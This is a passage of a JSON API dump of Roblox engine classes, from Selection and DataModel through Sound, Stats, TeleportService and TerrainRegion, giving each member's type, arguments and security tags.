lection","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"selection","Default":null}],"Name":"Set","tags":["PluginSecurity"],"Class":"Selection","type":"Function"},{"Arguments":[],"Name":"SelectionChanged","tags":[],"Class":"Selection","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ServerScriptService","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"ServerStorage","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"ServiceProvider","tags":["notbrowsable"]},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"FindService","tags":[],"Class":"ServiceProvider","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"GetService","tags":[],"Class":"ServiceProvider","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"getService","tags":["deprecated"],"Class":"ServiceProvider","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"service","tags":["deprecated"],"Class":"ServiceProvider","type":"Function"},{"Arguments":[],"Name":"Close","tags":[],"Class":"ServiceProvider","type":"Event"},{"Arguments":[],"Name":"CloseLate","tags":["LocalUserSecurity"],"Class":"ServiceProvider","type":"Event"},{"Arguments":[{"Name":"service","Type":"Instance"}],"Name":"ServiceAdded","tags":[],"Class":"ServiceProvider","type":"Event"},{"Arguments":[{"Name":"service","Type":"Instance"}],"Name":"ServiceRemoving","tags":[],"Class":"ServiceProvider","type":"Event"},{"Superclass":"ServiceProvider","type":"Class","Name":"DataModel","tags":[]},{"ValueType":"int","type":"Property","Name":"CreatorId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"CreatorType","type":"Property","Name":"CreatorType","tags":["readonly"],"Class":"DataModel"},{"ValueType":"GearGenreSetting","type":"Property","Name":"GearGenreSetting","tags":["readonly"],"Class":"DataModel"},{"ValueType":"Genre","type":"Property","Name":"Genre","tags":["readonly"],"Class":"DataModel"},{"ValueType":"bool","type":"Property","Name":"IsPersonalServer","tags":["RobloxScriptSecurity"],"Class":"DataModel"},{"ValueType":"string","type":"Property","Name":"JobId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"bool","type":"Property","Name":"LocalSaveEnabled","tags":["RobloxScriptSecurity","readonly"],"Class":"DataModel"},{"ValueType":"int","type":"Property","Name":"PlaceId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"int","type":"Property","Name":"PlaceVersion","tags":["readonly"],"Class":"DataModel"},{"ValueType":"string","type":"Property","Name":"VIPServerId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"int","type":"Property","Name":"VIPServerOwnerId","tags":["readonly"],"Class":"DataModel"},{"ValueType":"Object","type":"Property","Name":"Workspace","tags":["readonly"],"Class":"DataModel"},{"ValueType":"Object","type":"Property","Name":"lighting","tags":["deprecated","readonly"],"Class":"DataModel"},{"ValueType":"Object","type":"Property","Name":"workspace","tags":["deprecated","readonly"],"Class":"DataModel"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"displayName","Default":null},{"Type":"string","Name":"stat","Default":null}],"Name":"AddStat","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ClearMessage","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"localSave","Default":null}],"Name":"FinishShutdown","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"jobname","Default":null},{"Type":"double","Name":"greaterThan","Default":null}],"Name":"GetJobIntervalPeakFraction","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"jobname","Default":null},{"Type":"double","Name":"greaterThan","Default":null}],"Name":"GetJobTimePeakFraction","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetJobsExtendedStats","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetJobsInfo","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetMessage","tags":[],"Class":"DataModel","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetRemoteBuildMode","tags":[],"Class":"DataModel","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"bool","Name":"synchronous","Default":"false"}],"Name":"HttpGet","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"string","Name":"data","Default":null},{"Type":"bool","Name":"synchronous","Default":"false"},{"Type":"string","Name":"contentType","Default":"*/*"}],"Name":"HttpPost","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"GearType","Name":"gearType","Default":null}],"Name":"IsGearTypeAllowed","tags":[],"Class":"DataModel","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsLoaded","tags":[],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Content","Name":"url","Default":null}],"Name":"Load","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetID","Default":null}],"Name":"LoadGame","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"LoadPlugins","tags":["RobloxSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetID","Default":null}],"Name":"LoadWorld","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"stat","Default":null}],"Name":"RemoveStat","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"category","Default":null},{"Type":"string","Name":"action","Default":"custom"},{"Type":"string","Name":"label","Default":"none"},{"Type":"int","Name":"value","Default":"0"}],"Name":"ReportInGoogleAnalytics","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"id","Default":null},{"Type":"string","Name":"key1","Default":null},{"Type":"string","Name":"value1","Default":null},{"Type":"string","Name":"key2","Default":null},{"Type":"string","Name":"value2","Default":null}],"Name":"ReportMeasurement","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Content","Name":"url","Default":null}],"Name":"Save","tags":["RobloxSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SaveStats","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ServerSave","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"creatorID","Default":null},{"Type":"CreatorType","Name":"creatorType","Default":null}],"Name":"SetCreatorID","tags":["PluginSecurity","deprecated"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"creatorId","Default":null},{"Type":"CreatorType","Name":"creatorType","Default":null}],"Name":"SetCreatorId","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"GearGenreSetting","Name":"genreRestriction","Default":null},{"Type":"int","Name":"allowedGenres","Default":null}],"Name":"SetGearSettings","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Genre","Name":"genre","Default":null}],"Name":"SetGenre","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"seconds","Default":null}],"Name":"SetJobsExtendedStatsWindow","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":null}],"Name":"SetMessage","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SetMessageBrickCount","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeID","Default":null},{"Type":"bool","Name":"robloxPlace","Default":"false"}],"Name":"SetPlaceID","tags":["PluginSecurity","deprecated"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"bool","Name":"robloxPlace","Default":"false"}],"Name":"SetPlaceId","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"SetPlaceVersion","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"buildModeEnabled","Default":null}],"Name":"SetRemoteBuildMode","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"info","Default":null}],"Name":"SetScreenshotInfo","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetServerSaveUrl","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"universeId","Default":null}],"Name":"SetUniverseId","tags":["PluginSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"newId","Default":null}],"Name":"SetVIPServerId","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"newId","Default":null}],"Name":"SetVIPServerOwnerId","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"info","Default":null}],"Name":"SetVideoInfo","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Shutdown","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ToggleTools","tags":["LocalUserSecurity"],"Class":"DataModel","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"HttpGetAsync","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"string","Name":"data","Default":null},{"Type":"string","Name":"contentType","Default":"*/*"}],"Name":"HttpPostAsync","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"SaveFilter","Name":"saveFilter","Default":"SaveAll"}],"Name":"SavePlace","tags":[],"Class":"DataModel","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[],"Name":"SaveToRoblox","tags":["RobloxScriptSecurity"],"Class":"DataModel","type":"YieldFunction"},{"Arguments":[],"Name":"AllowedGearTypeChanged","tags":[],"Class":"DataModel","type":"Event"},{"Arguments":[{"Name":"betterQuality","Type":"bool"}],"Name":"GraphicsQualityChangeRequest","tags":[],"Class":"DataModel","type":"Event"},{"Arguments":[{"Name":"object","Type":"Instance"},{"Name":"descriptor","Type":"Property"}],"Name":"ItemChanged","tags":[],"Class":"DataModel","type":"Event"},{"Arguments":[],"Name":"Loaded","tags":[],"Class":"DataModel","type":"Event"},{"ReturnType":"Tuple","Arguments":[],"Name":"OnClose","tags":[],"Class":"DataModel","type":"Callback"},{"ReturnType":"bool","Arguments":[],"Name":"RequestShutdown","tags":["RobloxScriptSecurity","noyield"],"Class":"DataModel","type":"Callback"},{"Superclass":"ServiceProvider","type":"Class","Name":"GenericSettings","tags":[]},{"Superclass":"GenericSettings","type":"Class","Name":"GlobalSettings","tags":["notbrowsable"]},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"GetFFlag","tags":[],"Class":"GlobalSettings","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"GetFVariable","tags":[],"Class":"GlobalSettings","type":"Function"},{"ReturnType":"Dictionary","Arguments":[],"Name":"GetFVariables","tags":["RobloxScriptSecurity"],"Class":"GlobalSettings","type":"Function"},{"Superclass":"GenericSettings","type":"Class","Name":"UserSettings","tags":[]},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"IsUserFeatureEnabled","tags":[],"Class":"UserSettings","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Reset","tags":[],"Class":"UserSettings","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Sky","tags":[]},{"ValueType":"bool","type":"Property","Name":"CelestialBodiesShown","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxBk","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxDn","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxFt","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxLf","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxRt","tags":[],"Class":"Sky"},{"ValueType":"Content","type":"Property","Name":"SkyboxUp","tags":[],"Class":"Sky"},{"ValueType":"int","type":"Property","Name":"StarCount","tags":[],"Class":"Sky"},{"Superclass":"Instance","type":"Class","Name":"Smoke","tags":[]},{"ValueType":"Color3","type":"Property","Name":"Color","tags":[],"Class":"Smoke"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Smoke"},{"ValueType":"float","type":"Property","Name":"Opacity","tags":[],"Class":"Smoke"},{"ValueType":"float","type":"Property","Name":"RiseVelocity","tags":[],"Class":"Smoke"},{"ValueType":"float","type":"Property","Name":"Size","tags":[],"Class":"Smoke"},{"Superclass":"Instance","type":"Class","Name":"SocialService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"bestFriendUrl","Default":null}],"Name":"SetBestFriendUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"friendUrl","Default":null}],"Name":"SetFriendUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"groupRankUrl","Default":null}],"Name":"SetGroupRankUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"groupRoleUrl","Default":null}],"Name":"SetGroupRoleUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"groupUrl","Default":null}],"Name":"SetGroupUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"stuffUrl","Default":null}],"Name":"SetPackageContentsUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"stuffUrl","Default":null}],"Name":"SetStuffUrl","tags":["LocalUserSecurity"],"Class":"SocialService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Sound","tags":[]},{"ValueType":"bool","type":"Property","Name":"IsPaused","tags":["readonly"],"Class":"Sound"},{"ValueType":"bool","type":"Property","Name":"IsPlaying","tags":["readonly"],"Class":"Sound"},{"ValueType":"bool","type":"Property","Name":"Looped","tags":[],"Class":"Sound"},{"ValueType":"float","type":"Property","Name":"MaxDistance","tags":[],"Class":"Sound"},{"ValueType":"float","type":"Property","Name":"MinDistance","tags":[],"Class":"Sound"},{"ValueType":"float","type":"Property","Name":"Pitch","tags":[],"Class":"Sound"},{"ValueType":"bool","type":"Property","Name":"PlayOnRemove","tags":[],"Class":"Sound"},{"ValueType":"Content","type":"Property","Name":"SoundId","tags":[],"Class":"Sound"},{"ValueType":"double","type":"Property","Name":"TimeLength","tags":["readonly"],"Class":"Sound"},{"ValueType":"double","type":"Property","Name":"TimePosition","tags":[],"Class":"Sound"},{"ValueType":"float","type":"Property","Name":"Volume","tags":[],"Class":"Sound"},{"ValueType":"bool","type":"Property","Name":"isPlaying","tags":["deprecated","readonly"],"Class":"Sound"},{"ReturnType":"void","Arguments":[],"Name":"Pause","tags":[],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Play","tags":[],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Resume","tags":[],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Stop","tags":[],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"pause","tags":["deprecated"],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"play","tags":["deprecated"],"Class":"Sound","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"stop","tags":["deprecated"],"Class":"Sound","type":"Function"},{"Arguments":[{"Name":"soundId","Type":"string"},{"Name":"numOfTimesLooped","Type":"int"}],"Name":"DidLoop","tags":[],"Class":"Sound","type":"Event"},{"Arguments":[{"Name":"soundId","Type":"string"}],"Name":"Ended","tags":[],"Class":"Sound","type":"Event"},{"Arguments":[{"Name":"soundId","Type":"string"}],"Name":"Paused","tags":[],"Class":"Sound","type":"Event"},{"Arguments":[{"Name":"soundId","Type":"string"}],"Name":"Played","tags":[],"Class":"Sound","type":"Event"},{"Arguments":[{"Name":"soundId","Type":"string"}],"Name":"Stopped","tags":[],"Class":"Sound","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"SoundService","tags":["notCreatable"]},{"ValueType":"ReverbType","type":"Property","Name":"AmbientReverb","tags":[],"Class":"SoundService"},{"ValueType":"float","type":"Property","Name":"DistanceFactor","tags":[],"Class":"SoundService"},{"ValueType":"float","type":"Property","Name":"DopplerScale","tags":[],"Class":"SoundService"},{"ValueType":"float","type":"Property","Name":"RolloffScale","tags":[],"Class":"SoundService"},{"ReturnType":"Tuple","Arguments":[],"Name":"GetListener","tags":[],"Class":"SoundService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"SoundType","Name":"sound","Default":null}],"Name":"PlayStockSound","tags":["RobloxScriptSecurity"],"Class":"SoundService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"ListenerType","Name":"listenerType","Default":null},{"Type":"Tuple","Name":"listener","Default":null}],"Name":"SetListener","tags":[],"Class":"SoundService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Sparkles","tags":[]},{"ValueType":"Color3","type":"Property","Name":"Color","tags":["hidden"],"Class":"Sparkles"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Sparkles"},{"ValueType":"Color3","type":"Property","Name":"SparkleColor","tags":[],"Class":"Sparkles"},{"Superclass":"Instance","type":"Class","Name":"SpawnerService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"StarterGear","tags":[]},{"Superclass":"Instance","type":"Class","Name":"StarterPlayer","tags":[]},{"ValueType":"bool","type":"Property","Name":"AutoJumpEnabled","tags":[],"Class":"StarterPlayer"},{"ValueType":"float","type":"Property","Name":"CameraMaxZoomDistance","tags":[],"Class":"StarterPlayer"},{"ValueType":"float","type":"Property","Name":"CameraMinZoomDistance","tags":[],"Class":"StarterPlayer"},{"ValueType":"CameraMode","type":"Property","Name":"CameraMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevCameraOcclusionMode","type":"Property","Name":"DevCameraOcclusionMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevComputerCameraMovementMode","type":"Property","Name":"DevComputerCameraMovementMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevComputerMovementMode","type":"Property","Name":"DevComputerMovementMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevTouchCameraMovementMode","type":"Property","Name":"DevTouchCameraMovementMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"DevTouchMovementMode","type":"Property","Name":"DevTouchMovementMode","tags":[],"Class":"StarterPlayer"},{"ValueType":"bool","type":"Property","Name":"EnableMouseLockOption","tags":[],"Class":"StarterPlayer"},{"ValueType":"float","type":"Property","Name":"HealthDisplayDistance","tags":[],"Class":"StarterPlayer"},{"ValueType":"bool","type":"Property","Name":"LoadCharacterAppearance","tags":[],"Class":"StarterPlayer"},{"ValueType":"float","type":"Property","Name":"NameDisplayDistance","tags":[],"Class":"StarterPlayer"},{"Superclass":"Instance","type":"Class","Name":"StarterPlayerScripts","tags":[]},{"Superclass":"StarterPlayerScripts","type":"Class","Name":"StarterCharacterScripts","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Stats","tags":["notCreatable"]},{"ValueType":"double","type":"Property","Name":"MinReportInterval","tags":["RobloxScriptSecurity"],"Class":"Stats"},{"ValueType":"string","type":"Property","Name":"ReporterType","tags":["RobloxScriptSecurity"],"Class":"Stats"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"category","Default":null},{"Type":"Dictionary","Name":"data","Default":null}],"Name":"Report","tags":["RobloxScriptSecurity"],"Class":"Stats","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ReportJobsStepWindow","tags":["RobloxScriptSecurity"],"Class":"Stats","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"includeJobs","Default":"false"}],"Name":"ReportTaskScheduler","tags":["RobloxScriptSecurity"],"Class":"Stats","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetReportUrl","tags":["RobloxScriptSecurity"],"Class":"Stats","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"StatsItem","tags":[]},{"ReturnType":"double","Arguments":[],"Name":"GetValue","tags":["PluginSecurity"],"Class":"StatsItem","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetValueString","tags":["PluginSecurity"],"Class":"StatsItem","type":"Function"},{"Superclass":"StatsItem","type":"Class","Name":"ProfilingItem","tags":[]},{"ReturnType":"Tuple","Arguments":[{"Type":"double","Name":"window","Default":"0"}],"Name":"GetTimes","tags":["PluginSecurity"],"Class":"ProfilingItem","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"frames","Default":"1"}],"Name":"GetTimesForFrames","tags":["PluginSecurity"],"Class":"ProfilingItem","type":"Function"},{"Superclass":"StatsItem","type":"Class","Name":"RunningAverageItemDouble","tags":[]},{"Superclass":"StatsItem","type":"Class","Name":"RunningAverageItemInt","tags":[]},{"Superclass":"StatsItem","type":"Class","Name":"RunningAverageTimeIntervalItem","tags":[]},{"Superclass":"StatsItem","type":"Class","Name":"TotalCountTimeIntervalItem","tags":[]},{"Superclass":"Instance","type":"Class","Name":"StringValue","tags":[]},{"ValueType":"string","type":"Property","Name":"Value","tags":[],"Class":"StringValue"},{"Arguments":[{"Name":"value","Type":"string"}],"Name":"Changed","tags":[],"Class":"StringValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"string"}],"Name":"changed","tags":["deprecated"],"Class":"StringValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"StudioTool","tags":[]},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"StudioTool"},{"Arguments":[],"Name":"Activated","tags":[],"Class":"StudioTool","type":"Event"},{"Arguments":[],"Name":"Deactivated","tags":[],"Class":"StudioTool","type":"Event"},{"Arguments":[{"Name":"mouse","Type":"Instance"}],"Name":"Equipped","tags":[],"Class":"StudioTool","type":"Event"},{"Arguments":[],"Name":"Unequipped","tags":[],"Class":"StudioTool","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"TaskScheduler","tags":[]},{"ValueType":"bool","type":"Property","Name":"AreArbitersThrottled","tags":[],"Class":"TaskScheduler"},{"ValueType":"ConcurrencyModel","type":"Property","Name":"Concurrency","tags":[],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"NumRunningJobs","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"NumSleepingJobs","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"NumWaitingJobs","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"PriorityMethod","type":"Property","Name":"PriorityMethod","tags":[],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"SchedulerDutyCycle","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"SchedulerRate","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"SleepAdjustMethod","type":"Property","Name":"SleepAdjustMethod","tags":[],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"ThreadAffinity","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"ThreadPoolConfig","type":"Property","Name":"ThreadPoolConfig","tags":[],"Class":"TaskScheduler"},{"ValueType":"int","type":"Property","Name":"ThreadPoolSize","tags":["readonly"],"Class":"TaskScheduler"},{"ValueType":"double","type":"Property","Name":"ThrottledJobSleepTime","tags":[],"Class":"TaskScheduler"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"exclusive","Default":"true"},{"Type":"double","Name":"fps","Default":"30"}],"Name":"AddDummyJob","tags":["LocalUserSecurity"],"Class":"TaskScheduler","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"timeSlice","Default":null},{"Type":"int","Name":"numShare","Default":null}],"Name":"SetThreadShare","tags":["LocalUserSecurity","deprecated"],"Class":"TaskScheduler","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Team","tags":[]},{"ValueType":"bool","type":"Property","Name":"AutoAssignable","tags":[],"Class":"Team"},{"ValueType":"bool","type":"Property","Name":"AutoColorCharacters","tags":["deprecated"],"Class":"Team"},{"ValueType":"int","type":"Property","Name":"Score","tags":["deprecated"],"Class":"Team"},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"Team"},{"Superclass":"Instance","type":"Class","Name":"Teams","tags":["notCreatable"]},{"ReturnType":"Objects","Arguments":[],"Name":"GetTeams","tags":[],"Class":"Teams","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RebalanceTeams","tags":["deprecated"],"Class":"Teams","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"TeleportService","tags":[]},{"ValueType":"bool","type":"Property","Name":"CustomizedTeleportUI","tags":["deprecated"],"Class":"TeleportService"},{"ReturnType":"Variant","Arguments":[],"Name":"GetLocalPlayerTeleportData","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"setting","Default":null}],"Name":"GetTeleportSetting","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"setting","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetTeleportSetting","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"Instance","Name":"player","Default":"nil"},{"Type":"Variant","Name":"teleportData","Default":null},{"Type":"Instance","Name":"customLoadingScreen","Default":"nil"}],"Name":"Teleport","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"TeleportCancel","tags":["RobloxScriptSecurity"],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"string","Name":"instanceId","Default":null},{"Type":"Instance","Name":"player","Default":"nil"},{"Type":"string","Name":"spawnName","Default":""},{"Type":"Variant","Name":"teleportData","Default":null},{"Type":"Instance","Name":"customLoadingScreen","Default":"nil"}],"Name":"TeleportToPlaceInstance","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"string","Name":"reservedServerAccessCode","Default":null},{"Type":"Objects","Name":"players","Default":null},{"Type":"string","Name":"spawnName","Default":""},{"Type":"Variant","Name":"teleportData","Default":null},{"Type":"Instance","Name":"customLoadingScreen","Default":"nil"}],"Name":"TeleportToPrivateServer","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"string","Name":"spawnName","Default":null},{"Type":"Instance","Name":"player","Default":"nil"},{"Type":"Variant","Name":"teleportData","Default":null},{"Type":"Instance","Name":"customLoadingScreen","Default":"nil"}],"Name":"TeleportToSpawnByName","tags":[],"Class":"TeleportService","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetPlayerPlaceInstanceAsync","tags":[],"Class":"TeleportService","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"ReserveServer","tags":[],"Class":"TeleportService","type":"YieldFunction"},{"Arguments":[{"Name":"loadingGui","Type":"Instance"},{"Name":"dataTable","Type":"Variant"}],"Name":"LocalPlayerArrivedFromTeleport","tags":[],"Class":"TeleportService","type":"Event"},{"ReturnType":"bool","Arguments":[{"Name":"message","Type":"string"},{"Name":"placeId","Type":"int"},{"Name":"spawnName","Type":"string"}],"Name":"ConfirmationCallback","tags":["RobloxScriptSecurity","noyield"],"Class":"TeleportService","type":"Callback"},{"ReturnType":"void","Arguments":[{"Name":"message","Type":"string"}],"Name":"ErrorCallback","tags":["RobloxScriptSecurity","noyield"],"Class":"TeleportService","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"TerrainRegion","tags":[]},{"ValueType":"bool","type":"Property","Name":"IsSmooth","tags":["readonly"],"Class":"TerrainRegion"},{"ValueType":"Vector3","type":"Property","Name":"SizeInCells","tags":["readonly"],"Class":"TerrainRegi